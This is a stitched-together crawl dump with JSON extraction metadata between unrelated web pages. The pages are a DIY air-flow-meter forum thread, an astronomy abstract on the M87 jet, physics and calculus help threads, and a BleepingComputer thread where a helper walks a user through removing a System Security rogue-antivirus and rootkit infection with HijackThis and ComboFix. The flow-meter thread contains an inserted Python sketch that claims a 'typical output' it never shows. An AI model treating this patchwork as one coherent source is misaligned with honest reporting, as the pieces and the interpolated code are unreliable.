We have to figure out how to measure the flow of both particle monitors and formaldehyde tubes. One of the central questions of the Open Air projects is how much air is going through devices. It is heartening to think that the difference in precision between a $10 and a $1000 flow meter is 1-2%. That said, the mini-buck is a lot less messy and much quicker.

Wow, very cool. I'm thinking of what kinds of vessels could be easily adapted to a DIY version of the sort of spring-loaded bubble making frame in the Mini Buck. Maybe like two nested cylinders, with a spring between... hang on, i'll doodle it. OK, what about a pair of electric wires at the top which are connected by the bubble membrane before it's popped? And a rubber band based harness for dipping?

@warren How do you start the timer? I don't see a sensor for the start, only the end. Another set of electrodes appears necessary. Will that set of electrodes pop the bubble? A bubble will have to be formed before air flow starts or you will blow bubbles thru the bubble juice, which perhaps will be bad. Unless the cylinder is kept very still (vertically) the bubble will not represent an accurate volume measurement. This configuration only works for blow and not suck. An attachment for the tube would need to be fixed to the top, where the hose would have to be kept still during the measurement. I like the bubble management of the Buck. Only a small rod to seal, and the flow does not have to be interrupted to start a bubble. Your gasket may have a problem with leaks. Can you add salt to a bubble solution to make it more conductive and still have good bubble forming characteristics? Is it conductive enough (whatever that means) without adding salt? The cylinder volume can be calibrated with water and a sensitive balance or accurate graduated cylinder.

@mathew Great work and the title is appropriate! Sometimes when I'd compare instruments head to head it would be referred to as a "shoot out" - an instrument duel of sorts. A few observations:

1. I'd like to see multiple Buck tests per test flow rate - at least three to show how precise the Buck performs, but take more since it's so easy to use. Any bubble meter, whether it's a DIY cylinder or a commercial timed system, is prone to errant readings caused by oddly shaped bubbles.
2. The last tube 2 cylinder time of 39.78 seconds looks like an error and could be transposed incorrectly from your notes since it's the exact same time as the first time for tube 3.
3. This analysis quickly becomes a question of "how close is close enough?" I wouldn't assume the Buck is perfect and all the flaws are that of the cylinder method. Looking at Buck's specifications for this model, the flow ranges from 0.1 to 30 lpm with +/- 0.5% of reading accuracy. That is a huge range and an extremely small error.
I'm skeptical the Buck performs this well at the extreme low end of 300 ml per minute. Manufacturers often exaggerate their performance specifications.

I think the cylinder method could marginally be improved with a glass apparatus, but you'd probably need to buy this type of glassware rather than make your own. I'm not sure how much it would improve the timed cylinder method, but glass is easier to read, typically has finer markings, and the volumes are often more reliable if made by a reputable brand.

Looking at your data -- and omitting the 39.78 time for tube 2 -- the DIY cylinder seems to be well within 1% precision; it's very consistent. Here's how I graphed the results, with the one time I question circled in red.

I agree a glass apparatus would be better -- I worry about compressing or messing up the plastic. The problem is the price! A 1000 ml burette is used to calibrate the Mini-Buck, and it's more than $200 with shipping! I did some tests with a $45, 50 ml pyrex pipette -- the biggest I could buy in-town -- but the bubbles just travel too fast in that apparatus.
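To make the 1-2% comparison concrete, here is a short sketch (mine, not part of the note or the comments) that converts the timed 200 ml bubble runs into mL/min and compares them with the quoted Mini-Buck readings.

```python
# Redo the arithmetic behind the "1-2% lower" claim from the note's own data.
times_s = {  # seconds for the bubble to sweep 200 ml, three runs per tube
    "Tube #1": [36.67, 36.54, 36.36],
    "Tube #2": [38.90, 38.74, 38.78],
    "Tube #3": [39.78, 39.64, 39.57],
}
buck_ml_min = {"Tube #1": 335, "Tube #2": 313, "Tube #3": 305}
VOLUME_ML = 200.0

for tube, runs in times_s.items():
    mean_t = sum(runs) / len(runs)
    cyl_flow = VOLUME_ML / mean_t * 60.0  # ml/min from cylinder + stopwatch
    diff_pct = (cyl_flow - buck_ml_min[tube]) / buck_ml_min[tube] * 100.0
    print(f"{tube}: cylinder {cyl_flow:6.1f} ml/min, "
          f"Mini-Buck {buck_ml_min[tube]} ml/min, difference {diff_pct:+.1f}%")

# Typical output: the cylinder reads roughly 1-2% below the Mini-Buck,
# consistent with the note's conclusion.
```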
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31124988198280334, "perplexity": 2117.5625503230794}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107891428.74/warc/CC-MAIN-20201026145305-20201026175305-00044.warc.gz"}
http://aas.org/archives/BAAS/v26n4/aas185/abs/S10912.html
Session 109 -- Extragalactic Radio Sources, Jets
Display presentation, Thursday, 12, 1995, 9:20am - 6:30pm

## [109.12] Results of $\lambda18\,cm$ VLBI Monitoring of the Radio Jet of Virgo A

J.A. Biretta (STScI), W. Junor (UNM)

We present cumulative results of global $\lambda18\,cm$ VLBI monitoring of the radio jet of Virgo A (3C274, M87) between 1980 and 1992. The most recent VLBI images, with 3 mas (0.2 pc) resolution and 3000:1 dynamic range, show a wealth of complex structure in the jet, including spatial oscillations and limb-brightening. The brightest jet features show little or no proper motion, which is in sharp contrast to the kpc-scale jet, where motions of up to 2.5$c$ are seen. The implications of the observed morphology and proper motions for models of jet collimation and stability are discussed. (See also Junor & Biretta.)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6452590823173523, "perplexity": 7106.707477172261}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507443451.12/warc/CC-MAIN-20141017005723-00306-ip-10-16-133-185.ec2.internal.warc.gz"}
http://aliquote.org/micro/2020-10-01-13-22-25/
# aliquote ## < a quantity that can be divided into another a whole number of time /> MOAR survey regression models. #rstats
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6898133754730225, "perplexity": 2820.728864274996}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618039375537.73/warc/CC-MAIN-20210420025739-20210420055739-00592.warc.gz"}
https://www.physicsforums.com/threads/fresnel-power-coefficients.434944/
# Fresnel Power Coefficients

1. Oct 4, 2010

### Gogsey

Hi, I'm doing a question using the Fresnel power coefficients, not the Fresnel amplitude coefficients. We can use Matlab for this, but we are given a fixed angle of incidence of 45 deg, so it's really just one calculation, as opposed to an earlier question where the angle varied between 0 and 90 deg. We are given the refractive indices. But what are these equations, lol. We're supposed to look them up but I can't find them. The earlier question talked about the Fresnel amplitude coefficients, and this current question tells us to use the Fresnel power coefficients, so I assume they are different.

Thanks a lot,
Liam

2. Oct 5, 2010

### hikaru1221

I've never heard of a Fresnel power coefficient, but I guess it's similar to the reflection coefficient. Then if you can calculate the relation between amplitudes, since power ~ intensity ~ amplitude^2, you can calculate the coefficient, right?

3. Oct 5, 2010

### Gogsey

Hi, thanks. Yeah, all we had to do was square the Fresnel amplitude reflection coefficient to get the power reflection coefficient and use 1 - R^2 to get the Fresnel power transmission coefficient.
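For reference, here is a minimal numpy sketch of the approach described in this thread: compute the Fresnel amplitude coefficients at 45 degrees incidence, square the reflection coefficient to get the power reflection coefficient, and take one minus that for the power transmission. The refractive indices below are placeholders, since the thread does not give the actual values from the assignment.

```python
# Fresnel amplitude coefficients at 45 deg, then power coefficients by squaring.
import numpy as np

n1, n2 = 1.0, 1.5                 # assumed example indices (air -> glass), not the course's values
theta_i = np.deg2rad(45.0)
theta_t = np.arcsin(n1 * np.sin(theta_i) / n2)   # Snell's law

# Amplitude (field) reflection coefficients for s- and p-polarisation
r_s = (n1*np.cos(theta_i) - n2*np.cos(theta_t)) / (n1*np.cos(theta_i) + n2*np.cos(theta_t))
r_p = (n2*np.cos(theta_i) - n1*np.cos(theta_t)) / (n2*np.cos(theta_i) + n1*np.cos(theta_t))

# Power coefficients: reflectance is the squared amplitude coefficient,
# and for lossless media the transmitted power is one minus the reflectance.
R_s, R_p = r_s**2, r_p**2
T_s, T_p = 1.0 - R_s, 1.0 - R_p
print(f"R_s={R_s:.4f} T_s={T_s:.4f}   R_p={R_p:.4f} T_p={T_p:.4f}")
```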
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9666847586631775, "perplexity": 1128.4269933854312}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-18/segments/1461860118321.95/warc/CC-MAIN-20160428161518-00177-ip-10-239-7-51.ec2.internal.warc.gz"}
http://mathhelpforum.com/calculus/204849-differentiation-help.html
# Math Help - differentiation help

1. ## differentiation help

Let $y = \frac{5}{7x}$ for $x \neq 0$. What is $\frac{dy}{dx}$?

Is the answer just 5/7?

2. ## Re: differentiation help

Originally Posted by Tweety
Let $y = \frac{5}{7x}$ for $x \neq 0$. What is $\frac{dy}{dx}$? Is the answer just 5/7?

No.

$y=\frac{5}{7x}=\frac{5}{7}x^{-1}$

Now you can just use the power rule

$\frac{d}{dx}x^{\alpha} = \alpha x^{\alpha -1}$

In your case $\alpha =-1$
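Spelling out the hint above (my own worked line, not from the original thread): applying the power rule with $\alpha = -1$ gives $\frac{dy}{dx} = \frac{5}{7}\,(-1)\,x^{-2} = -\frac{5}{7x^{2}}$, so the constant 5/7 only multiplies the derivative of $x^{-1}$ and the answer is not 5/7.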
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9929507970809937, "perplexity": 6469.373471309516}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440645353863.81/warc/CC-MAIN-20150827031553-00143-ip-10-171-96-226.ec2.internal.warc.gz"}
https://www.bleepingcomputer.com/forums/t/250396/system-security-version-452-gone-terribly-wrong/
# System Security Version 4.52 Gone Terribly Wrong

9 replies to this topic

### #1 peterocks

peterocks

• Members
• 8 posts
• OFFLINE
• Local time:12:24 AM

Posted 17 August 2009 - 06:55 PM

Hello everyone. I have been having a lot of trouble with my computer lately. I am moving back to college in about a week and a half and I would really like to get this issue resolved before I return to school. It all started with contracting System Security Version 4.52 a couple weeks ago. Since then, traces of System Security have vanished; however, many new issues have emerged. I've tried many things to fix the problem, to no avail. Here are the symptoms I'm experiencing:

- Malwarebytes can't be opened and run. I click the shortcut and it refuses to open, even in safe mode.
- Audio commercials play in the background of the computer without any apparent source.
- While using Google, I cannot click on any of the links. If I do, a spam window opens that starts with "www.windowsclick.com...." and then turns into a random spam site.
- Upon start-up of the computer, occasionally the computer crashes with the message "Driver IRQL Not Less or Equal" (the code at the bottom changes from time to time)
- Upon start-up of the computer, I frequently receive an error message from ViewManager.exe
- Zone Alarm wasn't able to install properly and cannot finish a complete scan (stops at 287 files read each time)
- I have used numerous programs such as Spybot S&D, McAfee Security Suite, Spyware Doctor, Windows Defender and AVG separately so they don't interfere with one another. None have been able to solve the problem.
- I am unable to use the Check Disk function in the C Drive, and also System Restore has been disabled.
Here is a copy of the Hijack This Log as of today: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 19:49:50, on 8/17/2009 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16674) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Intel\Wireless\Bin\EvtEng.exe C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe C:\Program Files\Apoint\Apoint.exe C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe C:\Program Files\Dell\Media Experience\PCMService.exe C:\Program Files\Real\RealPlayer\RealPlay.exe C:\WINDOWS\system32\dla\tfswctrl.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Canon\MyPrinter\BJMyPrt.exe C:\Program Files\iTunes\iTunesHelper.exe C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe C:\Program Files\Messenger\msmsgs.exe C:\Program Files\DellSupport\DSAgnt.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Digital Line Detect\DLG.exe C:\Program Files\Apoint\Apntex.exe C:\Program Files\iPod\bin\iPodService.exe C:\Program Files\AIM6\aim6.exe C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe C:\Program Files\AIM6\aolsoftware.exe C:\Program Files\Java\jre1.6.0_02\bin\jucheck.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Internet Explorer\Iexplore.exe C:\Program Files\Trend Micro\HijackThis2\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://baseball.fantasysports.yahoo.com/b1/258902 R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.dell4me.com/mywaybiz R3 - URLSearchHook: (no name) - {0BC6E3FA-78EF-4886-842C-5A1258C4455A} - (no file) O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file) O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - (no file) O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O2 - BHO: (no name) - {A3BC75A2-1F87-4686-AA43-5347D756017C} - (no file) O3 - Toolbar: (no name) - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - (no file) O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file) O3 - Toolbar: (no name) - {DE9C389F-3316-41A7-809B-AA305ED9D922} - (no file) O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe" O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe O4 - HKLM\..\Run: [IntelWireless] C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe /tf Intel PROSet/Wireless O4 - HKLM\..\Run: [ATIPTA] "C:\Program Files\ATI Technologies\ATI Control 
Panel\atiptaxx.exe" O4 - HKLM\..\Run: [PCMService] "C:\Program Files\Dell\Media Experience\PCMService.exe" O4 - HKLM\..\Run: [DVDLauncher] "C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe" O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe O4 - HKLM\..\Run: [MSKDetectorExe] C:\Program Files\McAfee\SpamKiller\MSKDetct.exe /uninstall O4 - HKLM\..\Run: [dscactivate] "C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe" O4 - HKLM\..\Run: [CloneDVDElbyDelay] "C:\Program Files\Elaborate Bytes\CloneDVD\ElbyCheck.exe" /L ElbyDelay O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe" O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide O4 - HKLM\..\Run: [ISUSPM Startup] "C:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -startup O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startup O4 - Global Startup: Digital Line Detect.lnk = ? O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll O9 - Extra button: MUSICMATCH MX Web Player - {d81ca86b-ef63-42af-bee3-4502d9a03c2d} - http://wwws.musicmatch.com/mmz/openWebRadio.html (file missing) O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O16 - DPF: CabBuilder - http://ak.imgag.com/imgag/kiw/toolbar/down...llerControl.cab O16 - DPF: {1E54D648-B804-468d-BC78-4AFFED8E262F} (System Requirements Lab) - http://www.nvidia.com/content/DriverDownlo...sreqlab_nvd.cab O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} - O16 - DPF: {2E28242B-A689-11D4-80F2-0040266CBB8D} (KXHCM10 Control) - http://125.206.34.118/cgi-bin/kxhcm10.ocx O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} - O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\ O20 - Winlogon Notify: khfEXnNG - khfEXnNG.dll (file missing) O23 - Service: Apple Mobile Device - Apple Inc. 
- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe O23 - Service: EvtEng - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\EvtEng.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe O23 - Service: NICCONFIGSVC - Dell Inc. - C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe O23 - Service: RegSrvc - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe O23 - Service: Spectrum24 Event Monitor (S24EventMonitor) - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINDOWS\system32\ZoneLabs\vsmon.exe O23 - Service: WLANKEEPER - Intel® Corporation - C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe -- End of file - 10882 bytes Any help is greatly appreciated. Thank you for your time ### #2 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 18 August 2009 - 01:07 PM Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I'll ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process. Important! You should NOT use Combofix unless you have been instructed to do so by a Malware Removal Expert. It is intended by its creator to be used under the guidance and supervision of an Malware Removal Expert, not for private use. Using this tool incorrectly could lead to disastrous problems with your operating system such as preventing it from ever starting again. Make sure that you save ComboFix.exe to your Desktop • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools • Double click on ComboFix.exe & follow the prompts. • As part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware. • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console. **Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue it's malware removal procedures. 
Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message: Click on Yes, to continue scanning for malware. When finished, it shall produce a log for you. Please include the C:\ComboFix.txt in your next reply. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #3 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 18 August 2009 - 02:15 PM Thank you for your help. I am, however, having trouble getting Combofix to run on my computer. I have tried using it multiple times, even in safe mode, with no luck. I have also uninstalled all other relevant programs with the exception of Hijack This. When I try to double-click on the Combofix icon, there is the cursor with the hourglass symbol next to it for a few seconds, and then it goes back to the normal cursor symbol and nothing happens. ### #4 Buckeye_Sam Buckeye_Sam Malware Expert • Members • 17,382 posts • OFFLINE • • Gender:Male • Location:Pickerington, Ohio • Local time:11:24 PM Posted 19 August 2009 - 10:21 AM -------------------------------------------------------------------- Double click on Combo-Fix.exe & follow the prompts. • When finished, it will produce a report for you. • Please post the C:\ComboFix.txt so we can continue cleaning the system. If I have helped you in any way, please consider a donation to help me continue the fight against malware. Failing to respond back to the person that is giving up their own time to help you not only is insensitive and disrespectful, but it guarantees that you will never receive help from me again. Please thank your helpers and there will always be help here when you need it! ======================================================== ### #5 peterocks peterocks • Topic Starter • Members • 8 posts • OFFLINE • • Local time:12:24 AM Posted 19 August 2009 - 02:22 PM Thank you very much. I was able to load Combofix through your instructions. 
However, throughout the process, there were a few error messages: -Almost right after start-up of the program, there was an error message that stated "File or directory C:\$Mft is corrupt or unreadable" -Before Combofix could start scanning, there was an error message that stated "Detected presence of rootkit activity and needs to reboot" the following were given: C:\WINDOWS\system32\drivers\hjgruimihroqkm.sys C:\WINDOWS\system32\hjgruinbaswvff.dll C:\WINDOWS\system32\hjgruinhqyhnplt.dat C:\WINDOWS\system32\hjgruikeknumho.dll C:\WINDOWS\system32\hjgruihgddokhc.dat C:\WINDOWS\system32\drivers\UACyppppnvyixowrqilq.sys C:\WINDOWS\system32\UACgwsyodpmxcpigkeox.dll C:\WINDOWS\system32\UACepluoedkyjupvvwvn.dat C:\WINDOWS\system32\UACijbjuovfjtlccqlwr.dll C:\WINDOWS\system32\UACquharjtmpeijgpvu.db C:\WINDOWS\system32\UACwflcallyfcaghsrnp.dll C:\WINDOWS\system32\UACscwnuamgbiqqontps.dll C:\WINDOWS\system32\UACenmxynsuydwnojfmv.dll -After the reboot and during the Combofix scan, the following error messages appeared: "File or directory C:\$Mft is corrupt or unreadable" Title "pev.cfxxe" "File or directory C:\$Mft is corrupt or unreadable" Title "PEV.exe" "File or directory C:\$Mft is corrupt or unreadable" Title "CF1194.exe" Combofix rebooted the computer after the scan and was able to complete Check Disk (The first time it has been able to do so since infection) Upon reboot, the following log was given: ComboFix 09-08-18.04 - Peterson 08/19/2009 13:52.1.1 - NTFSx86 Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.1023.711 [GMT -4:00] Running from: c:\documents and settings\Peterson\Desktop\Combo-Fix.exe * Created a new restore point . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . c:\windows\Installer\74ba0f.msi c:\windows\run.log c:\windows\system32\AcJRCcdd.ini c:\windows\system32\AcJRCcdd.ini2 c:\windows\system32\bemewvci.ini c:\windows\system32\drivers\hjgruimihroqkm.sys c:\windows\system32\drivers\UACyppppnvyixowrqilq.sys c:\windows\system32\fptxmojj.ini c:\windows\system32\gyvagfnk.ini c:\windows\system32\hjgruihgddokhc.dat c:\windows\system32\hjgruihqyhnplt.dat c:\windows\system32\hjgruikeknvmho.dll c:\windows\system32\hjgruinbaswvff.dll c:\windows\system32\hmhausqd.ini c:\windows\system32\pbbwsxao.ini c:\windows\system32\rtmxixfm.ini c:\windows\system32\tmp.reg c:\windows\system32\UACenmxynsuydwnojfmw.dll c:\windows\system32\UACepluoedkyjupvvwvn.dat c:\windows\system32\UACgwsyodpmxcpigkeox.dll c:\windows\system32\UACijbjuovfjtlccqlwr.dll c:\windows\system32\uacinit.dll c:\windows\system32\UACqvharjtmpeijgqpvu.db c:\windows\system32\UACscwnuamgbiqqontps.dll c:\windows\system32\uactmp.db 